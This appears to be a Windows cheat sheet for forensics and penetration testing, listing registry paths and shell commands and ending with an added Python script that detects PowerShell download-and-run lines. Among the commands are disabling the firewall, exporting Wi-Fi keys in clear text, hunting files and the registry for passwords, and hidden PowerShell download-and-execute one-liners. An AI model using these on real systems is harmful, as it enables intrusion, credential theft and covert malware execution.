This article collects useful information for Windows systems, covering the following areas:

  • Forensics
  • Network
  • Malware Analysis
  • Penetration Test


Important WINDOWS Files

Typically C:\Windows

DNS entries

Network settings

User & password hashes

Backup copy of SAM

Backup copy of SAM

Application Log

Security Log


Important REGISTRY Files


# Recently opened programs

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

# Latest documents in Office program

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs

# Manually entered URLs in Internet Explorer


# We can view past activity.



ipconfig /all

# Display IP Configuration

ipconfig /displaydns

# Displays the DNS records of domains that we have previously visited

netstat -ano

# List open connections

netstat -anop tcp 1

# Netstat loop (refresh the TCP connection list every second)

netstat -an | findstr LISTENING

# Displays listening ports

route print

# Display routing table

arp -a

# Show arp table

tftp -i ip GET remotefile

# Download a file from a remote PC with TFTP

netsh wlan show profiles

# Display the wireless network profiles we have previously connected to

netsh firewall set opmode disable

# Disable firewall on system

netsh wlan export profile folder=. key=clear

# Export all wireless network profiles we have previously connected to




# Get Windows Version


# Display current username

net user %USERNAME% *

# Change password of active user

findstr /si password *.txt *.xml *.xls

# Search for the word "password" in files (*.txt, *.xml, *.xls)

wmic qfe get

# Display system updates

reg query HKLM /f password /t REG_SZ /s

# Search for the word "password" in the registry (HKLM)

tasklist /M /FI "PID eq 6976"

# Display the DLL files loaded by the process with PID 6976

tasklist /FI "PID eq 5240"

# Show process with PID value 5240

netstat -ano | findstr "ESTABLISHED"

# Show connections


Gathering Information on Wireless Networks


netsh wlan show networks mode=bssid

netsh wlan show networks



Download a file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('','%TEMP%\yenismi');

Run the downloaded file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('','%TEMP%\newname.exe');Start-Process "%TEMP%\newname.exe"

Run the downloaded file (hidden)

powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('','%TEMP%\newname.exe'); Start-Process "%TEMP%\newname.exe"

Run an application with administrator privileges

powershell start-process cmd.exe -Verb runAs
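
For detection, the PowerShell one-liners above leave recognizable command lines in process-creation logs. The following is an added example, not part of the original article: a small triage script that tags those patterns. The tag names, verdict labels, sample command lines and the example.invalid URL are assumptions constructed for illustration.

```python
import re

# Indicators come from the one-liners on this page; tag names and verdicts are assumptions.
PATTERNS = {
    "download": re.compile(r"net\.webclient.*\.downloadfile\s*\("),
    "execute": re.compile(r"\bstart-process\b"),
    "elevate": re.compile(r"-verb\s+runas\b"),
    "temp_path": re.compile(r"%temp%|\$env:temp|\\appdata\\local\\temp\\"),
}

def normalize(cmdline):
    # Lower-case and drop cmd carets / PowerShell backticks used to split keywords.
    return re.sub(r"[\^`]", "", cmdline).lower()

def hidden_window(cmd):
    # PowerShell accepts any unambiguous prefix of -WindowStyle (-w, -win, ...).
    tokens = cmd.split()
    return any(
        flag.startswith("-") and len(flag) > 1
        and "windowstyle".startswith(flag[1:]) and value == "hidden"
        for flag, value in zip(tokens, tokens[1:])
    )

def classify(cmdline):
    cmd = normalize(cmdline)
    if "powershell" not in cmd:
        return set()
    tags = {name for name, rx in PATTERNS.items() if rx.search(cmd)}
    if hidden_window(cmd):
        tags.add("hidden")
    return tags

def verdict(tags):
    # Download followed by execution is the pattern worth an alert; the rest is context.
    if {"download", "execute"} <= tags:
        return "alert-hidden" if "hidden" in tags else "alert"
    if tags & {"download", "elevate", "hidden"}:
        return "review"
    return "ok"

# Constructed command lines, shaped like process-creation log entries.
SAMPLES = [
    r"powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.invalid/a','%TEMP%\newname.exe'); Start-Process '%TEMP%\newname.exe'",
    r"powershell (new-object System.Net.WebClient).DownloadFile('http://example.invalid/a','%TEMP%\newname.exe');Start-Process '%TEMP%\newname.exe'",
    r"powershell start-process cmd.exe -Verb runAs",
    r"powershell Get-ChildItem C:\Windows",
]

if __name__ == "__main__":
    for line in SAMPLES:
        tags = classify(line)
        print(verdict(tags), sorted(tags), line[:60])
```

The script only matches command lines that keep the WebClient and DownloadFile names on one line, so treat a miss as "not seen" rather than "clean".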



Cyber Security Researcher
